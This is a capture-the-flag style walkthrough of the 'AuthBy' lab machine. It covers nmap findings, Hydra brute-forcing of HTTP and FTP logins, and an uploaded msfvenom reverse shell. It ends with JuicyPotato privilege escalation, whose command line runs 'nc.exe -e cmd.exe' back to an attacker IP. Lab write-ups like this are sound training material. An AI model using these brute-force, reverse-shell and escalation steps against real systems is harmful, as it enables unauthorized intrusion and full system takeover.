AUTHBY

Index

1-Nmap

PORT     STATE SERVICE            VERSION
21/tcp   open  ftp                zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ----------   1 root     root      5610496 Oct 18  2011 zFTPServer.exe
| ----------   1 root     root           25 Feb 10  2011 UninstallService.bat
| ----------   1 root     root      4284928 Oct 18  2011 Uninstall.exe
| ----------   1 root     root           17 Aug 13  2011 StopService.bat
| ----------   1 root     root           18 Aug 13  2011 StartService.bat
| ----------   1 root     root         8736 Nov 09  2011 Settings.ini
| dr-xr-xr-x   1 root     root          512 Aug 20 23:56 log
| ----------   1 root     root         2275 Aug 08  2011 LICENSE.htm
| ----------   1 root     root           23 Feb 10  2011 InstallService.bat
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 extensions
| dr-xr-xr-x   1 root     root          512 Nov 08  2011 certificates
|_dr-xr-xr-x   1 root     root          512 Mar 31 06:42 accounts
242/tcp  open  http       Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
|_http-title: 401 Authorization Required
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|
|     Extra information:
|
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     / [GENERIC]
|
|     References:
|       http://www.mkit.com.ar/labs/htexploit/
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_      http://capec.mitre.org/data/definitions/274.html
3145/tcp open  zftp-admin zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2021-08-20T16:56:51+00:00
| ssl-cert: Subject: commonName=LIVDA
| Not valid before: 2021-03-09T19:01:52
|_Not valid after:  2021-09-08T19:01:52
|_ssl-date: 2021-08-20T16:56:56+00:00; 0s from scanner time.
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

2-FTP as anonymous

When performing the scan we see that there is an FTP server where we can access this with the user Anonymous and there is a folder called accounts, inside this we see that there are 3 users (offsec, anonymous and admin) but we do not have permissions to download the files:

FTP connection

3-Hydra

So we will save this information for later, there is also a web server hosted on port 242 in which you have to authenticate to view it, we can use one of the previous users to run a brute force attack with hydra and thus authenticate:

Brute force with Hydra to HTTP auth

As we can see the user is offsec with the password elite and we can now authenticate, let's see what is inside the web page:

Log in HTTP

It shows us the following text Qui e nuce nuculeum esse volt, frangit nucem!, as we can't do anything here we are going to try to brute force the admin user in FTP, in this case, we will use the -e parameter to try to make the connection through SSL and if it fails we will try without SSL:

Brute force FTP admin user

3-FTP as admin

We've got the password, let's see what's in the directory:

Log in as admin in FTP

4-Reverse shell

As we can see, it is the same directory as the web page, so if we upload a reverse shell we can gain access to the machine:

Generate a reverse shell with msfvenom

We will then listen on port 4444 to receive the reverse shell:

Listen in 4444 port

Upload it to the web directory:

Upload the reverse shell

Now go to the reverse shell path on the web page to exploit it and then we get the shell:

Shell as livda

5-Privilege escalation

If we look at the privileges we have we see that we have SeImpersonatePrivilege:

User Privileges

Knowing this we can use the juicypotato tool to escalate privileges, not being in RDP we can not generate another console with the user nt/atuhority system so we will send a reverse shell, we also see that the machine is x86, so you have to look for the compatible tool:

System

We can use one of the BITS CSLIDs from here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise.

After downloading it from the link (https://github.com/ivanitlearning/Juicy-Potato-x86/releases) and uploading it via FTP, run the following command:

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.45.177 4444" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9}
JuicyPotato

By listening on port 4444 we will receive the shell with privileges:

nt authority\system
PreviousAPEXNextBILLYBOSS

Last updated